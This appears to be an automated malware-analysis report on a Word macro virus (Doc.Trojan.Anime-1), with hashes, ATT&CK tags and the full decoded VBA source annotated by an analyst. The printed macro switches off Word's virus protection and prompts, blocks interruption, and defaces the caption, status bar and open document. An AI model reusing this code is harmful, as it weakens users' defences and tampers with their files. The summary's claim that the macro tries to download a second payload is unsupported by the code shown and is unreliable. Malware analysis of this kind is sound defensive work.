Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf2d1fb2bb73c7a7…

MALICIOUS

Office (OLE)

Size: 32.5 KB
Created: 2000-02-25 03:01:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 90e906631af3042c5fd3024d8b1a61cf
SHA-1: 37d82673cd308f07c8b2d6fa1ea9f721d8d13489
SHA-256: bf2d1fb2bb73c7a735f30a92f115c7bba789c7fe821941e32b4f87a70a6e0d1a
Risk score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Anime-1. It contains VBA macros that execute when the document is opened. The macro code appears obfuscated (its strings are assembled from Chr() calls) and manipulates the application's status bar and clipboard, suggesting an attempt to download and execute a secondary payload. The presence of VBA macros strongly indicates a spearphishing attachment delivery vector.

Heuristics (2)

  • ClamAV: Doc.Trojan.Anime-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Anime-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1656 bytes
SHA-256: aef79b1150bf688dba14581dd2678723bf0542ea355183d2ae770491fbbb2035
Detection: ClamAV: Doc.Trojan.Anime-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub anime()

' Analyst note: every (n - n) expression evaluates to 0 (False). This silences
' conversion prompts, the Word macro virus warning and the Normal template save prompt.
Options.ConfirmConversions = (2 - 2): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1): Application.DisplayRecentFiles = (10 - 10)

Set cb = New DataObject
oi = Chr(32)   ' Analyst note: a single space character
Application.EnableCancelKey = wdCancelDisabled   ' Analyst note: Ctrl+Break cannot interrupt the macro
' Analyst note: the Chr() sequence decodes to "VicodinES" followed by two spaces
S = Chr(86) + Chr(105) + Chr(99) + Chr(111) + Chr(100) + Chr(105) + Chr(110) + Chr(69) + Chr(83) + oi + oi
' Analyst note: the Word title bar becomes "  VicodinES  /TNN /CB  "
Application.Caption = oi + oi + S + Chr(47) + Chr(84) + Chr(78) + Chr(78) + oi + Chr(47) + Chr(67) + Chr(66) + oi + oi
' Analyst note: three passes of a status-bar "animation" that repeatedly prepends the decoded string
For an = 1 To 3
For x = 1 To 15
yy = S + yy
Application.StatusBar = yy
Call Delay
Next x
For t = 1 To 12
yy = S + vbTab + yy
Application.StatusBar = yy
Call Delay
Next t
For u = 1 To 10
yy = vbTab + S + vbTab + yy
Application.StatusBar = yy
Call Delay
Next u
Next an
' Analyst note: prepends "VicodinES   --->" (Chr(45) is "-", Chr(62) is ">")
yy = S + oi + Chr(45) + Chr(45) + Chr(45) + Chr(62) + oi + yy
For i = 1 To 115
yy = oi + yy
Application.StatusBar = yy
For o = 1 To 400000
Next o
Next i
' Analyst note: prefixes the smiley ">:-)" to the status-bar text
Application.StatusBar = Chr(62) + Chr(58) + Chr(45) + Chr(41) + yy
' Analyst note: Chr(76..115) decodes to "Loves"; Application.Application resolves to the
' application name "Microsoft Word" through its default Name property, so the caption reads
' "Microsoft Word Loves <user name>"
Application.Caption = Application.Application & oi & Chr(76) & Chr(111) & Chr(118) & Chr(101) & Chr(115) & oi & Application.UserName
' Analyst note: cr is never assigned (no Option Explicit), so it concatenates as an empty string;
' the same "Loves" string is placed on the clipboard and pasted into the open document
cb.SetText cr & Application.Application & oi & Chr(76) & Chr(111) & Chr(118) & Chr(101) & Chr(115) & oi & Application.UserName & cr & cr
cb.PutInClipboard
Selection.Paste
End Sub
' Analyst note: busy-wait loop used as a crude delay between status-bar updates
Function Delay()
For o = 1 To 1000000
Next o
End Function